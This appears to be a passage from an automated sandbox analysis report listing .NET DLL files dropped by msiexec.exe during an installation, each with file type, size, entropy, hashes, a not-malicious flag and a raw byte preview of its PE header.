                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21224
                      Entropy (8bit):6.91070814532456
                      Encrypted:false
                      SSDEEP:
                      MD5:E06BAE626965FBDB0BAE5437498B5155
                      SHA1:49392F58BE6F5C97C5DE59BFC44F9CFCBE1E5DD7
                      SHA-256:19766A20B62B038ABC3E863F2D6E7B55FABEE4D9CBCAD3EB1D7BD3EBFE8D023A
                      SHA-512:69C6D8D5F8835DA31D36940F0AE793BD00D87E9CB9380C3A7B21FE3E315F192F95B8E63C8F9D0A3737C73673A0AEAC41FC728FB7B236F12453A953066F9E53E7
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................|(..O....@..@................>...`......D'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P ..t....................&......................................BSJB............v4.0.30319......l.......#~......X...#Strings....L.......#US.P.......#GUID...`.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21192
                      Entropy (8bit):6.92602478259668
                      Encrypted:false
                      SSDEEP:
                      MD5:2E6378FEAEEE2F745417FC025C7850F9
                      SHA1:E0FAD5EF75676B2ED7CF155AF6602B867FCED041
                      SHA-256:99920CE34A01A0C07EFD86D6E134BB401993515D001B7567A4116AD222993A63
                      SHA-512:5A8C41F32598BCF8C8E315B18AD5F1BBC377D7B638DC05CAA3CC47E988536AA0EBE4718D73AEE39ED5004328BE3A9DE9722D8759E5DFD500038E7139DADF9638
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............B)... ...@....... ....................................@..................................(..O....@...................>...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3............................................................T.....,.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):115856
                      Entropy (8bit):5.631610124521223
                      Encrypted:false
                      SSDEEP:
                      MD5:AAA2CBF14E06E9D3586D8A4ED455DB33
                      SHA1:3D216458740AD5CB05BC5F7C3491CDE44A1E5DF0
                      SHA-256:1D3EF8698281E7CF7371D1554AFEF5872B39F96C26DA772210A33DA041BA1183
                      SHA-512:0B14A039CA67982794A2BB69974EF04A7FBEE3686D7364F8F4DB70EA6259D29640CBB83D5B544D92FA1D3676C7619CD580FF45671A2BB4753ED8B383597C6DA8
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ..............................DF....@.................................f...O........................>.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21696
                      Entropy (8bit):6.907185647363724
                      Encrypted:false
                      SSDEEP:
                      MD5:55D9528D161567A19DBB71244B3AE3CE
                      SHA1:8A2FB74CF11719708774FC378D8B5BFCC541C986
                      SHA-256:870EE1141CB61ABFCE44507E39BFDD734F2335E34D89ECFFFB13838195A6B936
                      SHA-512:5338B067297B8CB157C5389D79D0440A6492841C85794EA15B805B5F71CFED445EFA9099C95E5BDEF8CF3902A6B10F032BFC356B0598DDE4F89FA5B349737907
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............+... ...@....... ...............................L....@.................................0+..O....@...................>...`.......)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................d+......H.......P ..(...................x)......................................BSJB............v4.0.30319......l...x...#~......$...#Strings............#US.........#GUID...........#Blob......................3......................................x.........w.o.....o.....\...............<.....Y.................................................G...........V.....V.....V...).V...1.V...9.V...A.V...I.V...Q.V...Y.V...a.V...i.V...q.V.......................#.....+.....3.....;.....C./...K.O...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21224
                      Entropy (8bit):6.911906528800318
                      Encrypted:false
                      SSDEEP:
                      MD5:DEFAADD4A92D4D348B0827AB8159D2FE
                      SHA1:F3BD9B4108ACD42ABFB99A3A4760BFFCB84F6C28
                      SHA-256:3D2551D6458B84566025FDDFE5DAD479CAB5785428EFD6814860D36AD1811C9A
                      SHA-512:1B13C70F05D56871008D5C8752BC93C8FB590D5F89B4E97264F592CDFD772CBBCCE8380D255F8BB305BC25BCDDEA21E422617FA614DFFD3DDCC9A1D4BE6C54A5
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...................................@..................................(..O....@..@................>...`......\'............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....d.......#US.h.......#GUID...x.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21736
                      Entropy (8bit):6.863412750707488
                      Encrypted:false
                      SSDEEP:
                      MD5:CF318475E6A7A56789ABB0F98C37ABE1
                      SHA1:33D1EBD7212D747C8723CFB9E4292C99A641B964
                      SHA-256:0383DC02FDF0B5D4612D8CAAAD13D594CAC1609C8240B73DFD6EA5803F5E17EA
                      SHA-512:5C67456A65FD051147281E14041F5165C1852FD6519DFC8DFCF9C86F20217CDAD9E2D26F815B557B99E2DB3500AF47B2DF8A1225A659FA1069815CD62302458F
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............N*... ...@....... ....................................@..................................)..O....@..@................>...`.......(............................................... ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B................0*......H.......P ......................D(......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................z.....N.....:.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):22200
                      Entropy (8bit):6.818690002285853
                      Encrypted:false
                      SSDEEP:
                      MD5:1A3DA139180E9FAB380033D8D1FE3995
                      SHA1:3CA31DE7F0F0784559E5A73EBD0EFB42C34D18FC
                      SHA-256:63AAF632EE7F3BC852C4D71C742CF1D26F18F784F6C89113E056B2599BA8F514
                      SHA-512:D991298419FB5290D6906A1F9FCCEF56BB3E17506E235C85B4D979EBC49ABD4F4B3123697E675346B57829C3EFDEED6291A155D69348CD55B8B6B2EEC9F804A1
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............r,... ...@....... ..............................Z4....@................................. ,..O....@...................>...`.......*............................................... ............... ..H............text...x.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................T,......H.......P ......................h*......................................BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID...........#Blob......................3................................"...............1.............{.................................Q.....j.......................n...................u.....u.....u...).u...1.u...9.u...A.u...I.u...Q.u...Y.u...a.u...i.u...q.u.......................#.....+.....3.....;.....C.....K.N...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.897645601910542
                      Encrypted:false
                      SSDEEP:
                      MD5:F1CC91D25B52C7504DC5BEAB5D0F498C
                      SHA1:498F0FBBD2712F4F637BDB7370B2302FCC4966F3
                      SHA-256:E3036362506D96C9C00ED6393A2AFCACD9F2E71CD2A35C1D638A61E85D2FB040
                      SHA-512:4C931389035DF21AE67810D8C8E95CB613D9495E2392B11E34D84F624F90C78C541B14FB0D6FE7F0F89799AAD4B34E91FB6F73978AE38231840F047915E6EB5B
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................q....@.................................D(..O....@...................>...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21232
                      Entropy (8bit):6.926543977764199
                      Encrypted:false
                      SSDEEP:
                      MD5:9E71DFCE86F14BEEB8F3E9F00D0A472E
                      SHA1:BF83A7E98418BDE907DEAE8C0C0F3FB0F6C9DB1A
                      SHA-256:62DCE4679E33C079E11F41B096BC803B30B1D963A1EA79EFA84187CEBBC06AFE
                      SHA-512:FF8CDC0287E510F859F46C1E35F9B0FB42EAD907B1EAA42C90C84B31CF6C2D4638CF682777F359B8611DD22062C1A5FA71F7FB667B7A3903783673E678098515
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@..`................>...`.......'............................................... ............... ..H............text...4.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B.................)......H.......P ......................$'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................W.....W...R.D.........f.......................=.....V.....}...........q.........................>.....>.....>...).>...1.>...9.>...A.>...I.>...Q.>...Y.>...a.>...i.>...q.>.......................#.....+.....3.....;."...C.=...K.]...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.904224159979604
                      Encrypted:false
                      SSDEEP:
                      MD5:05D1B950C470EA8B0AA357F9A59CF264
                      SHA1:B1756DC750ED5CFD5D0BFC70CB899FD590867A0C
                      SHA-256:DAAABD07F1B94BE19D72913360286E469F454886850AFCC603506EAAB03150E4
                      SHA-512:8E65FF1909AC8D65F599062E61AC935A919D43404C357DBC6AD628923B0C7ED7158862DDD272CFC1C2A8CEC393D48A57BC4D69CE7706EEF1BB6838826B1AFAE3
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................D(..O....@...................>...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................x(......H.......P ..<....................&......................................BSJB............v4.0.30319......l...|...#~......0...#Strings............#US.........#GUID...,.......#Blob......................3......................................z...............\.....0..... .....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):18024
                      Entropy (8bit):6.343772893394079
                      Encrypted:false
                      SSDEEP:
                      MD5:C610E828B54001574D86DD2ED730E392
                      SHA1:180A7BAAFBC820A838BBACA434032D9D33CCEEBE
                      SHA-256:37768488E8EF45729BC7D9A2677633C6450042975BB96516E186DA6CB9CD0DCF
                      SHA-512:441610D2B9F841D25494D7C82222D07E1D443B0DA07F0CF735C25EC82F6CCE99A3F3236872AEC38CC4DF779E615D22469666066CCEFED7FE75982EEFADA46396
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Ksa...........!.................6... ...@....@.. ....................................@..................................6..K....@..............."..h$...`.......$............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................6......H.......D%..<...................P ......................................_...+.'g.......x2..}}...B.O....T...e..?.M..R"M.~pg..c..LD#..y.....y....:u.v*...#.;.-.h.......0..#.....a5|T%W...].!.%'..9.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21784
                      Entropy (8bit):6.872325269765102
                      Encrypted:false
                      SSDEEP:
                      MD5:9F31B6954FD453F13B5F39DA36F2E8EB
                      SHA1:7A6276348D85EAF00AE6958117797045929078CB
                      SHA-256:18A610B8BAD43CF784CDE4D4902A238F2281C2A677DAAE790CAB55F6DA915979
                      SHA-512:D3696D4D60CFC5AA5834F60A0B97A4F3A3F8EC3FB05BEB3C3D927426B72B3E5463C628C7DF950E43FF1344823B8C2D39730BA47BA0F2FEC7A0CFCDC237A5BCC6
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............j*... ...@....... ...............................R....@..................................*..O....@...................?...`.......(............................................... ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................L*......H.......P ......................`(......................................BSJB............v4.0.30319......l...@...#~......0...#Strings............#US.........#GUID....... ...#Blob......................3................................................w.................!...........<.....Y.............................................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.)...C.D...K.d...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21720
                      Entropy (8bit):6.851248273705748
                      Encrypted:false
                      SSDEEP:
                      MD5:B0346A4C5FA0FAC135509A0E7D3C4449
                      SHA1:7D71B46BB9A28289384AA1EDF5CB03D64B3BCFF0
                      SHA-256:F9FEB277F86241F55425182A26DECF50A210675D4F040EC542AF3FB3DD287DE6
                      SHA-512:916A465236F11FF6E421800961B20CB80A320176DA8C58002F6742040CE33C5207D378667A584C5D8E35CF8CFC19AC54504B3F6129E489EEABD86A5B4E7D8C77
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............*... ...@....... ...............................Y....@..................................)..O....@.. ................>...`.......(............................................... ............... ..H............text...$.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings............#US.........#GUID...........#Blob......................3..................................................|.....|...S.i.........g.................f...........5.....~...........P.....9...................c.....c.....c...).c...1.c...9.c...A.c...I.c...Q.c...Y.c...a.c...i.c...q.c.......................#.....+.....3.....;.....C.6...K.V...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.924980445039345
                      Encrypted:false
                      SSDEEP:
                      MD5:65FBBA7A86B3E175200AE44727AB40E5
                      SHA1:584B8683943A8E0AE98B10F452C94F6109D1C4EA
                      SHA-256:7A81D2A001B543B2A55C9AFFC845A5DF7EDAB1FD308C6979BBD982B1B826B57C
                      SHA-512:43607AEBBB0A3F2D437C7DE77785CD6C9F49411E1D4EFE41ECCD93D7FCCA197DABD4E15F45FBC4FBFF27C202FEC96B79F82202AFC88B59C20ED5E7912BCDC6D3
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............V)... ...@....... ...............................d....@..................................)..O....@...................>...`.......'............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8)......H.......P ......................L'......................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID...........#Blob......................3..................................................*.....*...c.....J.....w.................v.....,.....E.................`.....I...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):28624
                      Entropy (8bit):6.700175270481286
                      Encrypted:false
                      SSDEEP:
                      MD5:568B53398BFC0E54AAF448B68F5C77C2
                      SHA1:76B0B6E65E38A90A4ECDB3F6DFE16D5A803081E9
                      SHA-256:8BB9D52BA5C67F05C8F632DEB1E7E98A909318B10E1388B47E919515FDD42CBF
                      SHA-512:6052EE3664FD2095DE3338CF6D24DF022DC13D00B4BF14C57572F2A34AC078E07BD1F634A50028DB0952AE8067FFCF19079177FA534240D9526F33AE1E1459AC
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..&...........E... ...`....... ...............................V....@.................................PE..O....`..x............0...?...........D............................................... ............... ..H............text....%... ...&.................. ..`.rsrc...x....`.......(..............@..@.reloc..............................@..B.................E......H........$...............A.......C......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r/..p.(....*......(....*2(.....(....*^~....-.(.........~....*.0..........~..........(.........(....-Y..(!....{/......5..,
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):24296
                      Entropy (8bit):6.780229572480669
                      Encrypted:false
                      SSDEEP:
                      MD5:D7E74EA95786A02687CE43C356ABDC95
                      SHA1:2E6A3047BD3BCEE01F55D139A3C03E6D4D2DB14A
                      SHA-256:383A1F9DAC655C6805C24D4A03BC5FBEB9ABD1536DE5510F5756259EEFCB4871
                      SHA-512:B7E76B65406904F092FE96DED558A94EA53FA40BEC500EFCDCDEBF124921F4526DE2F239CD25BAE1801692DD6DFE5652FFD46B2AA4325133C7127D27F626BB9B
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............r5... ...@....... ...............................k....@................................. 5..O....@..P............ ...>...`.......3............................................... ............... ..H............text...x.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B................T5......H.......P ......................h3......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................r.....................e...........4.................3.....L...................................R...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.898006718463938
                      Encrypted:false
                      SSDEEP:
                      MD5:6CCCA0BA6A7B9CAF8B8D3B0287DBED8B
                      SHA1:B81FF87B407578EFBF184BDC10D0F101610379DB
                      SHA-256:16E7EFD6C19B2E3E516AE1BC7B3175D0E22F1AD357701F229E353DA348EEE182
                      SHA-512:8505479031A0A5CAEEEE1A8A60AA35D7E0C332BBFDDE61193B615E242C127780E55F404289F26930E9EC9E53FCCF436B1A991BA2C8A9177163B41AAAF6BE0D32
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ....................................@.................................T(..O....@...................>...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......4...#Strings....(.......#US.,.......#GUID...<.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21264
                      Entropy (8bit):6.950539566613158
                      Encrypted:false
                      SSDEEP:
                      MD5:A42C32F4E98A9656FC2FED72D30E9380
                      SHA1:B6B8986FC1B5140817DE262AE4102499E37DAFFD
                      SHA-256:C343F7BF08A4C97A90BA607A492C721533333173FA63F65F6E5DE9CEEE65FC16
                      SHA-512:5C2DE8F18CB9B367D7DE88A2AF8A7FD538486B9FFB393972FBDFF42CD2899D6679FD8D7076FE37954D5E8EAB6C5041F19EDAD32659C5CCEEC1C2BA35E6F8982A
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@.................................|)..O....@...................?...`......D(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ..t....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....@.......#US.D.......#GUID...T... ...#Blob......................3............................................................U.x...........................~.....4.....M.................h.....$...................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r...a.r...i.r...q.r.......................#.....+.....3.....;.)...C.D...K.d...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21240
                      Entropy (8bit):6.93694523950017
                      Encrypted:false
                      SSDEEP:
                      MD5:E1E2239979B853157BA75310FEA7E65D
                      SHA1:EE1AE416570911282ABDD3745674E58F9D469C9E
                      SHA-256:E8D531F0AAA674F794B7F43EC76E4E32AD93F3C136020CF4B6E3433832F9C0DF
                      SHA-512:DDF9D6E05D9566C9E02295A061756FF164C408EA211D016023EDBFA91BBA4D0D7DFF293D2BF4D87C25FE923500C7535E4A21B6A8D4B18FD9505F8E5C635F9C95
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............>)... ...@....... ...............................#....@..................................(..O....@..`................>...`.......'............................................... ............... ..H............text...D.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................ )......H.......P ......................4'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...........@...\.@...0.-...`.....D.................C.................[.....x.....-.........................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.#...C.>...K.^...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):27048
                      Entropy (8bit):6.661112158879877
                      Encrypted:false
                      SSDEEP:
                      MD5:3373A24450373CAF0CBB756E10097FD4
                      SHA1:87C352153804FF5BD4F8AEF8851546F3CF22461E
                      SHA-256:575E26A455892F1FD77B730E6928F70B760E76094AFE5BCB677D854DAF869AC5
                      SHA-512:85E005B5BEB7C14BA34C62C38DA635962D1AA4740F91549B8659910EDD10F0FDE1734064B19567BF5BC63DBBBB62399F6CBE0AA323193DA599232DCE22B14A01
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............8... ...@....... ..............................Ag....@..................................8..O....@..8............*...?...`.......7............................................... ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`.......(..............@..B.................8......H.......|!..l............1..p...X7......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*..BSJB............v4.0.30319......l.......#~..h.......#Strings....\...4...#US.........#GUID...........#Blob...
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):24816
                      Entropy (8bit):6.774158289322937
                      Encrypted:false
                      SSDEEP:
                      MD5:9087373EEE85190DAF8915E614B1E4BD
                      SHA1:F434AF8CE30EAF5511E28C0230211F0D8ED4A154
                      SHA-256:557858E44A51A74646AD07A85CBA56AF1DA13AD26AC2F74EE5D8C3E8A171C221
                      SHA-512:F728238FA567457D7977FEA667FCCB56C2EFE718A9A362E294934CC752E506E05C5D20C0BE2A309DE2A984DD60C3AE4EA03054185B96C9B5F5F5DE827AF9CEAF
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............3... ...@....... ..............................6~....@..................................3..O....@..............."...>...`.......2............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................3......H........!..0...................L2.......................................s....*..s....*..0...........o....u......,..o....*.*.0..%........s..........(....r...p.$o......o....*:.(......}....*..{....*.(....z.(....z6.{.....o....*:.{......o....*.(....z:.{......o....*.(....z.(....z.BSJB............v4.0.30319......l.......#~.. .......#Strings....$...0...#US.T.......#GUID...d.......#Blob...........W..........3............................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):29360
                      Entropy (8bit):6.504362287456874
                      Encrypted:false
                      SSDEEP:
                      MD5:0E35085C130D2D91E5241334BE7EF0DA
                      SHA1:FD622ADE5CAE26353A22B6FA50A83669B72B6C41
                      SHA-256:50AD612D4CF6113DE26B2870DA099C4817F59E64A2DA98F05803B4A2E2304919
                      SHA-512:2498811F4AAC308CDC55C3406BEA4FEF5DC9E6F23559B09FB181F7447474EF586F00038282DDC39C241490B5DC2BCA7F41F19BD3E1BB00890DA29DF6489BB151
                      Malicious:false
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..*.........."H... ...`....... ..............................7.....@..................................G..O....`...............4...>...........F............................................... ............... ..H............text...((... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......P ...%...................F......................................BSJB............v4.0.30319......l.......#~..........#Strings.....#......#US..#......#GUID....#......#Blob......................3................................................_.........................8.....8...*.8.....8.....8.....8.....8.....8.........*.8.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.921540746927502
                      Encrypted:false
                      SSDEEP:
                      MD5:99604779C668D9B8EF913854B9A24F9D
                      SHA1:97B62A3DBE2465B4C995E082AD6FF183F6267F59
                      SHA-256:8270D1248950EE8AEE5C2AC2E321DF07E65C7A94004AE03C857DEACD231A5542
                      SHA-512:BE6DEE6E7030B400EAC68AC289EC9B74BFE0140EE59AF5E68BF43A63A821C6F6AD9CA03C501896A6C92464BF8116D7996FFE640AB51BD9FA96673D9794AC82CD
                      Malicious:false
                      Reputation:low
